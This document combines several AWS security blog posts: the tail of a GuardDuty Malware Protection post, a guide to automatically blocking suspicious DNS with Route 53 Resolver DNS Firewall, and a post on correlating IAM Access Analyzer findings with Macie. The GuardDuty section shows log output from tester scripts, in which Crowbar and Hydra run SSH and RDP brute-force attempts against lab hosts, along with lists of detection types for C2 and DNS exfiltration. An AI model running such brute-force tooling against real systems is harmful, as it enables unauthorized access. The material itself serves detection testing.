2022-05-19 09:37:35 Trying 172.16.0.20:22
2022-05-19 09:37:38 STOP
2022-05-19 09:37:38 No results found...
2022-05-19 09:37:38 START
2022-05-19 09:37:38 Crowbar v0.4.3-dev
2022-05-19 09:37:38 Trying 172.16.0.20:22
2022-05-19 09:37:42 STOP
2022-05-19 09:37:42 No results found...
2022-05-19 09:37:42 START
2022-05-19 09:37:42 Crowbar v0.4.3-dev
2022-05-19 09:37:42 Trying 172.16.0.20:22
2022-05-19 09:37:46 STOP
2022-05-19 09:37:46 No results found...

-----------------------------------------------------------------------

***********************************************************************
* Test #3 - RDP Brute Force with Password List                        *
* This simulates an RDP brute force attack on the internal RDP port  *
* of the windows server that we installed in the environment.  It uses*
* a list of common passwords that can be found on the web. This test  *
* will trigger a detection, but will fail to get into the target      *
* windows instance.                                                   *
***********************************************************************

Sending 250 password attempts at the windows server...
Hydra v9.4-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-19 09:37:46
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1792 login tries (l:7/p:256), ~448 tries per task
[DATA] attacking rdp://172.16.0.24:3389/
[STATUS] 1099.00 tries/min, 1099 tries in 00:01h, 693 to do in 00:01h, 4 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-19 09:39:23

-----------------------------------------------------------------------

***********************************************************************
* Test #4 - CryptoCurrency Mining Activity                            *
* This simulates interaction with a cryptocurrency mining pool which *
* can be an indication of an instance compromise. In this case, we are*
* only interacting with the URL of the pool, but not downloading      *
* any files. This will trigger a threat intel based detection.        *
***********************************************************************

Calling bitcoin wallets to download mining toolkits

-----------------------------------------------------------------------

***********************************************************************
* Test #5 - DNS Exfiltration                                          *
* A common exfiltration technique is to tunnel data out over DNS      *
* to a fake domain.  Its an effective technique because most hosts    *
* have outbound DNS ports open.  This test wont exfiltrate any data,  *
* but it will generate enough unusual DNS activity to trigger the     *
* detection.                                                          *
***********************************************************************

Calling large numbers of large domains to simulate tunneling via DNS

***********************************************************************
* Test #6 - Fake domain to prove that GuardDuty is working            *
* This is a permanent fake domain that customers can use to prove that*
* GuardDuty is working.  Calling this domain will always generate the *
* Backdoor:EC2/C&CActivity.B!DNS finding type                         *
***********************************************************************

Calling a well known fake domain that is used to generate a known finding

; <<>> DiG 9.11.4-P2-RedHat-9.11.4-26.P2.amzn2.5.2 <<>> GuardDutyC2ActivityB.com any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11495
;; flags: qr rd ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;GuardDutyC2ActivityB.com.	IN	ANY

;; ANSWER SECTION:
GuardDutyC2ActivityB.com. 6943	IN	SOA	ns1.markmonitor.com. hostmaster.markmonitor.com. 2018091906 86400 3600 2592000 172800
GuardDutyC2ActivityB.com. 6943	IN	NS	ns3.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns5.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns7.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns2.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns4.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns6.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns1.markmonitor.com.

;; Query time: 27 msec
;; SERVER: 172.16.0.2#53(172.16.0.2)
;; WHEN: Thu May 19 09:39:23 UTC 2022
;; MSG SIZE  rcvd: 238


*****************************************************************************************************
Expected GuardDuty Findings

Test 1: Internal Port Scanning
Expected Finding: EC2 Instance  i-011e73af27562827b  is performing outbound port scans against remote host. 172.16.0.20
Finding Type: Recon:EC2/Portscan

Test 2: SSH Brute Force with Compromised Keys
Expecting two findings - one for the outbound and one for the inbound detection
Outbound:  i-011e73af27562827b  is performing SSH brute force attacks against  172.16.0.20
Inbound:  172.16.0.25  is performing SSH brute force attacks against  i-0bada13e0aa12d383
Finding Type: UnauthorizedAccess:EC2/SSHBruteForce

Test 3: RDP Brute Force with Password List
Expecting two findings - one for the outbound and one for the inbound detection
Outbound:  i-011e73af27562827b  is performing RDP brute force attacks against  172.16.0.24
Inbound:  172.16.0.25  is performing RDP brute force attacks against  i-0191573dec3b66924
Finding Type : UnauthorizedAccess:EC2/RDPBruteForce

Test 4: Cryptocurrency Activity
Expected Finding: EC2 Instance  i-011e73af27562827b  is querying a domain name that is associated with bitcoin activity
Finding Type : CryptoCurrency:EC2/BitcoinTool.B!DNS

Test 5: DNS Exfiltration
Expected Finding: EC2 instance  i-011e73af27562827b  is attempting to query domain names that resemble exfiltrated data
Finding Type : Trojan:EC2/DNSDataExfiltration

Test 6: C&C Activity
Expected Finding: EC2 instance  i-011e73af27562827b  is querying a domain name associated with a known Command & Control server. 
Finding Type : Backdoor:EC2/C&CActivity.B!DNS

After a few minutes, the findings appear in the GuardDuty console. At the top, I see the malicious files found by the new Malware Protection capability. One of the findings is related to an EC2 instance, the other to an ECS cluster.

Console screenshot.

First, I select the finding related to the EC2 instance. In the panel, I see the information on the instance and the malicious file, such as the file name and path. In the Malware scan details section, the Trigger finding ID points to the original GuardDuty finding that triggered the malware scan. In my case, the original finding was that this EC2 instance was performing RDP brute force attacks against another EC2 instance.

Console screenshot.

Here, I choose Investigate with Detective and, directly from the GuardDuty console, I go to the Detective console to visualize AWS CloudTrail and Amazon Virtual Private Cloud (Amazon VPC) flow data for the EC2 instance, the AWS account, and the IP address affected by the finding. Using Detective, I can analyze, investigate, and identify the root cause of suspicious activities found by GuardDuty.

Console screenshot.

When I select the finding related to the ECS cluster, I have more information on the resource affected, such as the details of the ECS cluster, the task, the containers, and the container images.

Console screenshot.

Using the GuardDuty tester scripts makes it easier to test the overall integration of GuardDuty with other security frameworks you use so that you can be ready when a real threat is detected.

Comparing GuardDuty Malware Protection with Amazon Inspector
At this point, you might ask yourself how GuardDuty Malware Protection relates to Amazon Inspector, a service that scans AWS workloads for software vulnerabilities and unintended network exposure. The two services complement each other and offer different layers of protection:

  • Amazon Inspector offers proactive protection by identifying and remediating known software and application vulnerabilities that serve as an entry point for attackers to compromise resources and install malware.
  • GuardDuty Malware Protection detects malware that is found to be present on actively running workloads. At that point, the system has already been compromised, but GuardDuty can limit the time of an infection and take action before a system compromise results in a business-impacting event.

Availability and Pricing
Amazon GuardDuty Malware Protection is available today in all AWS Regions where GuardDuty is available, excluding the AWS China (Beijing), AWS China (Ningxia), AWS GovCloud (US-East), and AWS GovCloud (US-West) Regions.

At launch, GuardDuty Malware Protection is integrated with these partner offerings:

With GuardDuty, you don’t need to deploy security software or agents to monitor for malware. You only pay for the amount of GB scanned in the file systems (not for the size of the EBS volumes) and for the EBS snapshots during the time they are kept in your account. All EBS snapshots created by GuardDuty are automatically deleted after they are scanned unless you enable snapshot retention when malware is found. For more information, see GuardDuty pricing and EBS pricing. Note that GuardDuty only scans EBS volumes less than 1 TB in size. To help you control costs and avoid repeating alarms, the same volume is not scanned more often than once every 24 hours.

Detect malicious activity and protect your applications from malware with Amazon GuardDuty.

Danilo

Automatically block suspicious DNS activity with Amazon GuardDuty and Route 53 Resolver DNS Firewall

Post Syndicated from Akshay Karanth original https://aws.amazon.com/blogs/security/automatically-block-suspicious-dns-activity-with-amazon-guardduty-and-route-53-resolver-dns-firewall/

In this blog post, we’ll show you how to use Amazon Route 53 Resolver DNS Firewall to automatically respond to suspicious DNS queries that are detected by Amazon GuardDuty within your Amazon Web Services (AWS) environment.

The Security Pillar of the AWS Well-Architected Framework includes incident response, stating that your organization should implement mechanisms to automatically respond to and mitigate the potential impact of security issues. Automating incident response helps you scale your capabilities, rapidly reduce the scope of compromised resources, and reduce repetitive work by security teams.

Use cases for Route 53 Resolver DNS Firewall

Route 53 Resolver DNS Firewall is a managed firewall that you can use to block DNS queries that are made for known malicious domains and to allow queries for trusted domains. It provides more granular control over the DNS querying behavior of resources within your VPCs.

Let’s discuss two use cases for Route 53 Resolver DNS Firewall:

Use of allow lists – If you have stricter security requirements around network security controls and want to deny all outbound DNS queries for domains that don’t match those on your lists of approved domains (known as allow lists), you can create such rules. This is called a walled garden approach to DNS security. These allow lists only include the domains for which resources within your Amazon Virtual Private Cloud (Amazon VPC) are allowed to make DNS queries through Amazon-provided DNS. This helps to ensure that the DNS queries containing the domains that your organization doesn’t trust are blocked.

Use of deny lists – If your organization prefers to allow all outbound DNS lookups within your accounts by default and only requires the ability to block DNS queries for known malicious domains, you can use DNS Firewall to create deny lists, which include all the malicious domain names that your organization is aware of. DNS Firewall also provides AWS Managed Rules, giving you to the ability to configure protections against known DNS threats like command-and-control (C&C) bots. You can also add block lists from open-source third-party threat intelligence sources.

A few important points about the use of allow and deny lists:

  1. Broader use of allow lists is more effective at blocking a greater number of malicious DNS queries than a short deny list. For example, if your workloads only need access to .com domains, then allowing only .com will block many malicious domains that might be specific to certain countries. View a list of country code top-level domains (ccTLDs).
  2. If you use allow lists, you need to make sure that you keep up with the domains that your applications need to communicate with. Likewise, if you use deny lists, you need to keep up with updates to the lists.
  3. Allow lists and deny lists are not mutually exclusive models and can be used together. For example, let’s say that you have an allow list that only allows .com domains (with the intention of blocking several ccTLDs by default). You can also use the built-in AWS Managed Rules deny list to block known malicious .com domains for an additional layer of security.

Solution overview

Refer to the DNS Firewall documentation to familiarize yourself with its constructs and understand how it works. The automation example we provide in this blog post is focused on providing blocks or alerts for DNS queries with suspicious domain names. For example, consider the scenario where an Amazon Elastic Compute Cloud (Amazon EC2) instance queries a domain name that is associated with a known command-and-control server. As shown in Figure 1, when GuardDuty detects communication with the malicious domain, it initiates a series of steps. First, AWS Step Functions orchestrates the remediation response through a defined workflow, then DNS Firewall adds the suspicious domain to deny list or alert list, and finally GuardDuty notifies the security operators of the attempted communication.

Figure 1: High-level solution overview

Figure 1: High-level solution overview

In this solution, the detection of threats by GuardDuty triggers the automated remediation procedure documented in this post. GuardDuty informs you of the status of your AWS environment by producing security findings. Each GuardDuty finding has an assigned severity level and value that reflects the potential risk that the finding could have to your network as determined by our security engineers. The value of the severity can fall anywhere within the 0.1 to 8.9 range, with higher values indicating greater security risk. To help you determine a response to a potential security issue that is highlighted by a finding, GuardDuty breaks down this range into High, Medium, and Low severity levels. We have seen that many of the DNS-based GuardDuty findings fall into the category of High severity, and many times these findings are strongly indicative of potential compromise (for example, pre ransomware activity).

In this blog post, we specifically focus on the following types of GuardDuty findings:

  • Backdoor:EC2/C&CActivity.B!DNS
  • Impact:EC2/MaliciousDomainRequest.Reputation
  • Trojan:EC2/DNSDataExfiltration

We’ve configured DNS Firewall to block only events with High severity by sending only those domains to the deny list. DNS Firewall sends the rest of the domains to an alert list.

This solution uses Step Functions and AWS Lambda so that incident response steps run in the correct order. Step Functions also provides retry and error-handling logic. Lambda functions interact with networking services to block traffic, and with databases to store data about blocked domain lists and AWS Security Hub finding Amazon Resource Names (ARNs).

How it works

Figure 2 shows the automated remediation workflow in detail.
 

Figure 2: Detailed workflow diagram

Figure 2: Detailed workflow diagram

The solution is implemented as follows:

  1. GuardDuty detects communication attempts that include a suspicious domain. GuardDuty generates a finding, in JSON format, that includes details such as the EC2 instance ID involved (if applicable), account information, type of finding, domain, and other details. Following is a sample finding (some fields removed for brevity).
    {
      "schemaVersion": "2.0",
      "accountId": "123456789012",
      "id": " 1234567890abcdef0",
      "type": "Backdoor:EC2/C&CActivity.B!DNS",
      "service": {
        "serviceName": "guardduty",
        "action": {
          "actionType": "DNS_REQUEST",
         "dnsRequestAction": {
    "domain": "guarddutyc2activityb.com",
    "protocol": "UDP",
    "blocked": false
          }
        }
      }
    }
    

  2. Security Hub ingests the finding generated by GuardDuty and consolidates it with findings from other AWS security services. Security Hub also publishes the contents of the finding to the default bus in Amazon EventBridge. Following is a snippet from a sample event published to EventBridge.
    { 
      "id": "12345abc-ca56-771b-cd1b-710550598e37", 
      "detail-type": "Security Hub Findings - Imported", 
      "source": "aws.securityhub", 
      "account": "123456789012", 
      "time": "2021-01-05T01:20:33Z", 
      "region": "us-east-1", 
      "detail": { 
        "findings": [ 
            { "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/guardduty", 
            "Types": ["Software and Configuration Checks/Backdoor:EC2.C&CActivity.B!DNS"], 
            "LastObservedAt": "2021-01-05T01:15:01.549Z", 
            "ProductFields": 
                {"aws/guardduty/service/action/dnsRequestAction/blocked": "false",
                "aws/guardduty/service/action/dnsRequestAction/domain": "guarddutyc2activityb.com"} 
                }
                ]}}
    

  3. EventBridge has a rule with an event pattern that matches GuardDuty events that contain the malicious domain name. When an event matching the pattern is published on the default bus, EventBridge routes that event to the designated target, in this case a Step Functions state machine. Following is a snippet of AWS CloudFormation code that defines the EventBridge rule.
    # EventBridge Event Rule - For Security Hub event published to EventBridge:
      SecurityHubtoFirewallStateMachineEvent:
        Type: "AWS::Events::Rule"
        Properties:
          Description: "Security Hub - GuardDuty findings with DNS Domain"
          EventPattern:
            source:
            - aws.securityhub
            detail:
              findings:
                ProductFields:
                  aws/guardduty/service/action/dnsRequestAction/blocked:
                    - "exists": true
          State: "ENABLED"
          Targets:
            -
              Arn: !GetAtt SecurityHubtoDnsFirewallStateMachine.Arn
              RoleArn: !GetAtt SecurityHubtoFirewallStateMachineEventRole.Arn
              Id: "GuardDutyEvent-StepFunctions-Trigger"
    

  4. The Step Functions state machine ingests the details of the Security Hub finding published in EventBridge and orchestrates the remediation response through a defined workflow. Figure 3 shows the state machine workflow.
     
    Figure 3: AWS Step Functions state machine workflow

    Figure 3: AWS Step Functions state machine workflow

  5. The first two steps in the state machine, getDomainFromDynamo and isDomainInDynamo, invoke the Lambda function CheckDomainInDynamoLambdaFunction that checks whether the flagged domain is already in the Amazon DynamoDB table. If the domain already exists in DynamoDB, then the workflow continues to check whether the domain is also in the domain list and adds it accordingly. If the domain is not in DynamoDB, then the workflow considers it a new addition and adds the domain to both domain lists, as well as the DynamoDB table.
  6. The next three steps in the state machine—getDomainFromDomainList, isDomainInDomainList, and addDomainToDnsFirewallDomainList—invoke a second Lambda function that checks and updates the DNS Firewall domain lists with the domain name. Figure 4 shows an example of the DNS Firewall rules and associated domain list.
     
    Figure 4: Sample rules in a DNS Firewall rule group

    Figure 4: Sample rules in a DNS Firewall rule group

    Figure 5 shows the domain lists.
     

    Figure 5: Domain lists

    Figure 5: Domain lists

    The next step in the state machine, updateDynamoDB, invokes a third Lambda function that updates the DynamoDB table with the domain that was just added to the domain list. Figure 6 shows an example domain entry that gets stored inside the DynamoDB table.
     

    Figure 6: DynamoDB table entry

    Figure 6: DynamoDB table entry

  7. The notifySuccess step of the state machine uses an Amazon Simple Notification Service (Amazon SNS) topic to send out a message that the automatic block or alert happened.
  8. If there was a failure in any of the previous steps, then the state machine runs the notifyFailure step. The state machine publishes a message on the SNS topic that the automated remediation workflow has failed to complete, and that manual intervention might be required.

Solution deployment and testing

To set up this solution, you’ll do the following steps:

  1. Verify prerequisites in your AWS account.
  2. Deploy the CloudFormation template.
  3. Create a test Security Hub event.
  4. Confirm the entry in the DNS Firewall rule group domain list.
  5. Confirm the SNS notification.
  6. Apply the rule group to your VPC by using DNS Firewall.

Step 1: Verify prerequisites in your AWS account

The sample solution we provide in this blog post requires that you activate both GuardDuty and Security Hub in your AWS account. If either of these services is not activated in your account, do the following:

Step 2: Deploy the CloudFormation template

For this next step, make sure that you deploy the template within the AWS account and the AWS Region where you want to monitor GuardDuty findings and block suspicious DNS activity. Depending on your architecture, you can deploy the solution one time centrally in a security account or deploy it repeatedly across multiple accounts.

To deploy the template

  1. Choose the Launch Stack button to launch a CloudFormation stack in your account:
    Select the Launch Stack button to launch the template

    Note: The stack will launch in the N. Virginia (us-east-1) Region. It takes approximately 15 minutes for the CloudFormation stack to complete. To deploy this solution into other AWS Regions, download the solution’s CloudFormation template and deploy it to the selected Region. Network Firewall isn’t currently available in all Regions. For more information about where it’s available, see the list of service endpoints.

  2. In the AWS CloudFormation console, select the Select Template form, and then choose Next.
  3. On the Specify Details page, provide the following input parameters. You can modify the default values to customize the solution for your environment.
    • AdminEmail – The email address to receive notifications. This must be a valid email address. There is no default value.
    • DnsFireWallAlertDomainListName – The name of the domain list for DNS Firewall that consists of domains that will be only alerted and not blocked. The default value is DemoAlertDomainListAutoUpdated.
    • DnsFireWallBlockDomainListName – The name of the domain list for DNS Firewall that consists of domains that will be blocked. The default value is DemoBlockedDomainListAutoUpdated.
    • DnsFirewallBlockAction – You can select NODATA or NXDOMAIN. NODATA implies that there is no response available if a DNS query from the VPC matches a domain in the block domain list. NXDOMAIN implies that the response is an error message, which indicates that a domain doesn’t exist. The default value is NODATA.

    Figure 7 shows an example of the values entered in the Parameters screen.

    Figure 7: Sample CloudFormation stack parameters

    Figure 7: Sample CloudFormation stack parameters

  4. After you’ve entered values for all of the input parameters, choose Next.
  5. On the Options page, keep the defaults, and then choose Next.
  6. On the Review page, in the Capabilities section, select the check box next to I acknowledge that AWS CloudFormation might create IAM resources. Then choose Create. Figure 8 shows what the CloudFormation capabilities acknowledgement prompt looks like.
     
    Figure 8: AWS CloudFormation capabilities acknowledgement

    Figure 8: AWS CloudFormation capabilities acknowledgement

While the stack is being created, check the email inbox that corresponds to the value that you gave for the AdminEmail address parameter. Look for an email message with the subject “AWS Notification – Subscription Confirmation.” Choose the link to confirm the subscription to the SNS topic.

After the Status field for the CloudFormation stack changes to CREATE_COMPLETE, as shown in Figure 9, the solution is implemented and is ready for testing.
 

Figure 9: CloudFormation stack completed deployment

Figure 9: CloudFormation stack completed deployment

Step 3: Create a test Security Hub event

After the CloudFormation stack has completed deployment, you can test the functionality by creating a test event in the same format as would be published by Security Hub.

To create a test run of the solution

  1. In the AWS Management Console, choose Services, choose CloudFormation, and then for Stack, choose the stack name that you provided in Step 2: Deploy the CloudFormation template.
  2. In the Resources tab for the stack, look for the SecurityHubDnsFirewallStateMachine entry. It should appear as shown in Figure 10.
     
    Figure 10: CloudFormation stack resources

    Figure 10: CloudFormation stack resources

  3. Choose the link in the entry. You’ll be redirected to the Step Functions console, with the state machine already open. Choose Start execution.
     
    Figure 11: AWS Step Functions state machine

    Figure 11: AWS Step Functions state machine

  4. To facilitate testing, we’ve provided a test event file. On the Start execution page, in the Input section, paste the C&CActivity.B!DNS finding sample as shown in Figure 12.
     
    Figure 12: Sample input for the Step Functions state machine execution

    Figure 12: Sample input for the Step Functions state machine execution

  5. Note the domain name guarddutyc2activityb.com for the remote host identified in the GuardDuty finding in the test event on line 57 of the sample. The solution should block or alert traffic from that domain name in the following steps.
  6. Choose Start execution to begin the processing of the test event.
  7. You can now track the state machine processing of the test event. The processing should complete within a few seconds. You can select different steps in the visual Graph inspector to view input and output data. Figure 13 shows the input to the addDomainToDnsFirewallDomainList step that launches a Lambda function that interacts with DNS Firewall.
     
    Figure 13: Step Functions state machine step details

    Figure 13: Step Functions state machine step details

Step 4: Confirm the entry in the DNS Firewall rule group

Now that a test event was processed by the state machine, you can check whether the DNS Firewall rule group would block traffic to the domain name identified in the GuardDuty finding.

To validate entries in the DNS Firewall rule group

  1. In the AWS Management Console, choose Services, and then choose VPC. In the DNS Firewall section in the left navigation bar, choose DNS Firewall rule groups.
  2. Choose the demoDnsFirewallRuleGroup rule group created by the solution, and you’ll be able to see the rules as shown in Figure 14.
     
    Figure 14: Select the DNS Firewall rule

    Figure 14: Select the DNS Firewall rule

  3. Choose the domain list associated with the BLOCK rule. Confirm that the rules blocking the traffic from the source and to the domain that you specified in the test event were created. The domain list should look similar to what is shown in Figure 15.
     
    Figure 15: Verify that the domain was added to the blocked domain list

    Figure 15: Verify that the domain was added to the blocked domain list

Step 5: Confirm the SNS notification

In this step, you’ll view the SNS notification that was sent to the email address you set up.

To confirm the SNS notification

  • Review the email inbox for the value that you provided for the AdminEmail parameter and look for a message with the subject line “AWS Notification Message.” The contents of the message from SNS should be similar to the following.
    {"Blocked":"true","Input":{"ResponseMetadata":{"RequestId":"HOLOAAENUS3MN9B0DS6CO8BF4BVV4KQNSO5AEMVJF66Q9ASUAAJG","HTTPStatusCode":200,"HTTPHeaders":{"server":"Server","date":"Wed, 17 Nov 2021 08:20:38 GMT","content-type":"application/x-amz-json-1.0","content-length":"2","connection":"keep-alive","x-amzn-requestid":"HOLOAAENUS3MN9B0DS6CO8BF4BVV4KQNSO5AEMVJF66Q9ASUAAJG","x-amz-crc32":"2745614147"},"RetryAttempts":0}}}
    

Step 6: Apply the rule group to your VPC by using DNS Firewall

As part of the CloudFormation template deployment, two test VPCs have been created for you, to demonstrate that you can assign a single DNS Firewall rule group to multiple VPCs. You can also associate this rule group to your existing VPC of interest. To learn how to do this task, see Managing associations between your VPC and Route 53 Resolver DNS Firewall rule group. For visibility into DNS queries and for debugging purposes, the template creates log groups that accumulate DNS Resolver query logs.

After you’ve successfully tested the given sample that emulates C&CActivity.B!DNS, you can repeat steps 3 to 6 for the MaliciousDomainRequest.Reputation finding sample and the DNSDataExfiltration finding sample.

These samples are supplied for your convenience, and you will see the blocking action in a matter of minutes. Alternatively, you can use other ways to test, which might need about an hour for blocking action to happen. To initiate DNS C&C activity, you can make a DNS request from your instance (using dig for Linux or nslookup for Windows) against the test domain guarddutyc2activityb.com. Alternatively, you can use GuardDuty Tester, which generates DNS C&C activity and DNS exfiltration unauthorized events.

To take this solution one step further, you can implement automatic aging out of the domains that get added to the domain list. One way to do this is to use the Time to Live feature in DynamoDB and keep repopulating the domain list from DynamoDB at regular intervals of time. The benefit of this is that if the malicious nature of a domain in the domain list changes over time, the list will be kept up to date during this age out and repopulation process.

Considerations

There are a few considerations that you should keep in mind regarding DNS Firewall:

  • DNS Firewall and AWS Network Firewall work together for improved domain-filtering capability across HTTP(S) traffic. A domain list that you configure in Network Firewall should reflect the domain list configured in DNS Firewall.
  • DNS Firewall filters based on the domain name. It doesn’t translate that domain name to an IP address to be blocked.
  • It’s a best practice to block outbound traffic to port 53 with network access control lists (network ACLs) or Network Firewall so that GuardDuty can monitor DNS queries.
  • DNS Firewall filters DNS queries to the Amazon Route 53 Resolver (also known as AmazonProvidedDNS or VPC .2 Resolver) in the VPC. So for traffic leaving the VPC, we recommend that you use DNS Firewall along with Network Firewall, which you can use to secure traffic that isn’t headed to Amazon Route 53 Resolver. Network Firewall can also block domain names that exist in network traffic leaving the Amazon VPC, such as in HTTP HOST headers, TLS Server Name Indication (SNI) fields, and so on.
  • You can use Network Firewall to block external encrypted DNS services so that these services can’t be used to circumvent your DNS Firewall policies.

Conclusion

In this blog post, you learned how to automatically block malicious domains by using Route 53 Resolver DNS Firewall and GuardDuty. You can use this sample solution to automatically block communication to suspicious hosts discovered by GuardDuty, and you can apply those blocks across all configured DNS Firewall firewalls within your account.

All of the code for this solution is available on GitHub. Feel free to play around with the code; we hope it helps you learn more about automated security remediation. You can adjust the code to better fit your unique environment or extend the code with additional steps.

If you have comments about this blog post, submit them in the Comments section below. If you have questions about using this solution, start a thread in the Route 53 Resolver forum or GuardDuty forums, or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Akshay Karanth

Akshay is a senior solutions architect at AWS. He helps digital native businesses learn, build, and grow in the AWS Cloud. Before AWS, he worked at companies such as Juniper Networks and Microsoft in various customer facing roles across networking and security domains. When not at work, Akshay enjoys hiking up a hard trail or cooking a fulfilling meal with his family.

Author

Rohit Aswani

Rohit is a specialist solutions architect focussed on Networking at AWS, where he helps customers build and design scalable, highly-available, secure, resilient, and cost-effective networks. He holds an MS in telecommunication systems management from Northeastern University, specializing in computer networking.

Contributor

Special thanks to Fabrice Dall’ara who made significant contributions to this post.

Correlate IAM Access Analyzer findings with Amazon Macie

Post Syndicated from Nihar Das original https://aws.amazon.com/blogs/security/correlate-iam-access-analyzer-findings-with-amazon-macie/

In this blog post, you’ll learn how to detect when unintended access has been granted to sensitive data in Amazon Simple Storage Service (Amazon S3) buckets in your Amazon Web Services (AWS) accounts.

It’s critical for your enterprise to understand where sensitive data is stored in your organization and how and why it is shared. The ability to efficiently find data that is shared with entities outside your account and the contents of that data is paramount. You need a process to quickly detect and report which accounts have access to sensitive data. Amazon Macie is an AWS service that can detect many sensitive data types. Macie is a fully managed data security and data privacy service that uses machine learning and pattern matching to discover and help protect your sensitive data in AWS.

AWS Identity and Access Management (IAM) Access Analyzer helps to identify resources in your organization and accounts, such as S3 buckets or IAM roles, that are shared with an external entity. When you enable IAM Access Analyzer, you create an analyzer for your entire organization or your account. The organization or account you choose is known as the zone of trust for the analyzer. The analyzer monitors the supported resources within your zone of trust. This analyzer enables IAM Access Analyzer to detect each instance of a resource shared outside the zone of trust and generates a finding about the resource and the external principals that have access to it.

Currently, you can use IAM Access Analyzer and Macie to detect external access and discover sensitive data as separate processes. You can join the findings from both to best evaluate the risk. The solution in this post integrates IAM Access Analyzer, Macie, and AWS Security Hub to automate the process of correlating findings between the services and presenting them in Security Hub.

How does the solution work?

First, IAM Access Analyzer discovers S3 buckets that are shared outside the zone of trust. Next, the solution schedules a Macie sensitive data discovery job for each of these buckets to determine if the bucket contains sensitive data. Upon discovery of shared sensitive data in S3, a custom high severity finding is created in Security Hub for review and incident response.

Solution architecture

This solution is based on a serverless architecture, and uses the following services:

Figure 1: Architecture diagram

Figure 1: Architecture diagram

Figure 1 depicts the following process flow:

  1. IAM Access Analyzer detects shared S3 buckets outside of the zone of trust—the organization or account you choose is known as a zone of trust for the analyzer—and creates the event Access Analyzer Finding in EventBridge.
  2. EventBridge triggers the Lambda function sda-aa-save-findings.
  3. The sda-aa-save-findings function records each finding in DynamoDB.
  4. An EventBridge scheduled event periodically starts a new cycle of the Step Function state machine, which immediately runs the Lambda function sda-macie-submit-scan. The template sets a 15-minute interval, but this is configurable.
  5. The sda-macie-submit-scan function reads the IAM Access Analyzer findings that were created by sda-aa-save-findings from DynamoDB.
  6. sda-macie-submit-scan launches a Macie classification job for each distinct S3 bucket that is related to one or more recent IAM Access Analyzer findings.
  7. Macie performs a sensitive discovery scan on each requested S3 bucket.
  8. The sda-macie-submit-scan function initiates the Lambda function sda-macie-check-status.
  9. sda-macie-check-status periodically checks the status of each Macie classification job, waiting for all the Macie jobs initiated by this solution to complete.
  10. Upon completion of the sda-macie-check-status function, the step function runs the Lambda function sda-sh-create-findings.
  11. sda-sh-create-findings joins the resulting IAM Access Analyzer and Macie datasets for each S3 bucket.
  12. sda-sh-create-findings publishes a finding to Security Hub for each bucket that has both external access and sensitive data.

    Note: The Macie scan is skipped if the S3 bucket is tagged to be excluded or if it was recently scanned by Macie. See the Cost considerations section for more information on custom configurations.

  13. Information security can review and act on the findings shown in Security Hub.

Sample Security Hub output

Figure 2 shows the sample findings that Security Hub will present. Each finding includes:

  • Severity
  • Workflow status
  • Record state
  • Company
  • Product
  • Title
  • Resource
Figure 2: Sample Security Hub findings

Figure 2: Sample Security Hub findings

The output to Security Hub will display a severity of HIGH with workflow NEW, because this is the first time the event has been observed. The record state is ACTIVE because the workflow state is NEW. The title explains the reason for the event.

For example, if potentially sensitive data is discovered in a bucket that is shared outside a zone of trust, selecting an event will display the resources involved in the finding so you can investigate. For more information, see the Security Hub User Guide.

Notes:

  • Detection of public S3 buckets by IAM Access Analyzer will still occur through Security Hub and will be marked as critical severity. This solution does not add to or augment this finding in Security Hub.
  • If a finding in IAM Access Analyzer is archived, the solution does not update the related finding in Security Hub.

Prerequisites

To use this solution, you need the following:

  • Permission to run AWS CloudFormation
  • Permission to create Lambda functions
  • Permission to create DynamoDB tables
  • Permission to create Step Function state machines
  • Permission to create EventBridge event rules
  • Permission to enable IAM Access Analyzer on the account where sensitive discovery is required
  • Permission to enable Macie on the account
  • Permission to enable Security Hub on the account

Deploy the solution

The solution is deployed through AWS CloudFormation, and you can review the template for options to best suit your specific needs.

  1. Sign in to your AWS account located at https://aws.amazon.com/console/.
  2. In the AWS Management Console, navigate to the AWS CloudFormation service, and then choose Create stack.
  3. Under Prerequisite – Prepare template, choose Template is ready.
  4. Under Specify template, choose Amazon S3 URL and provide the following URL:
    https://awsiammedia.s3.amazonaws.com/public/sample/936-correlating-aa-findings-macie/sda-cfn.yml
  5. Choose Next.
  6. Enter the stack name.
  7. The Application code location, S3 Bucket and S3 Key fields will be pre-filled.
  8. Under Service Activations, modify the activations based on the services you presently have running in your account.
  9. Modify the Logging and Monitoring settings if required.
  10. (Optional) Set an alert email address for errors.
  11. Choose Next, then choose Next again.
  12. Under Capabilities, select the check box.
  13. Choose Create Stack. The solution will begin deploying; watch for the CREATE_COMPLETE message.
Figure 3: Sample CloudFormation deployment status

Figure 3: Sample CloudFormation deployment status

The solution is now deployed and will start monitoring for sensitive data that is being shared. It will send the findings to Security Hub for your teams to investigate.

Cost considerations

When you scan large S3 buckets with sensitive data, remember that Macie cost is based on the amount of data scanned. For more information on Macie costs, see Amazon Macie pricing.

This solution allows the following options, which you can use to help manage costs:

  • Use environment variables in Lambda to skip specific tagged buckets
  • Skip recently scanned S3 buckets and reuse prior findings
Figure 4: Screen shot of configurable environment variable

Figure 4: Screen shot of configurable environment variable

Conclusion

